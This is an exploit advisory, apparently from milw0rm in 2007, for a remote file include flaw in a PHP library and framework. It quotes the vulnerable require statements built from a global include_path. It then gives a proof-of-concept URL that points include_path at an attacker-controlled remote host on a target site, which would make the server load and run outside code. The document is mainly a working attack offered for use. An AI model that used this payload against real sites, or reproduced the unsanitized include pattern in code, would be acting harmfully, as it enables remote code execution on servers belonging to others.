36 lines
No EOL
830 B
Text
36 lines
No EOL
830 B
Text
-----------------------------------------------
|
|
|
|
PhP Generic library & framework (include_path) Remote File Include Exploit
|
|
|
|
-----------------------------------------------
|
|
|
|
Author: xoron
|
|
|
|
xoron.biz
|
|
|
|
-----------------------------------------------
|
|
|
|
Code:
|
|
|
|
require $GLOBALS[include_path]."configmember.php";
|
|
require $GLOBALS[include_path]."inc-membreManager.php";
|
|
|
|
-----------------------------------------------
|
|
|
|
POC:
|
|
|
|
www.[target].com/[script_pat]/membres/membreManager.php?include_path=http://evilscripts?
|
|
|
|
-----------------------------------------------
|
|
|
|
download: http://sourceforge.net/project/showfiles.php?group_id=72529
|
|
|
|
-----------------------------------------------
|
|
|
|
xoron gider izi kalir, selametle.
|
|
|
|
kaybetmenin tiryakisi bir çoçuk xoron.
|
|
|
|
-----------------------------------------------
|
|
|
|
# milw0rm.com [2007-01-28] |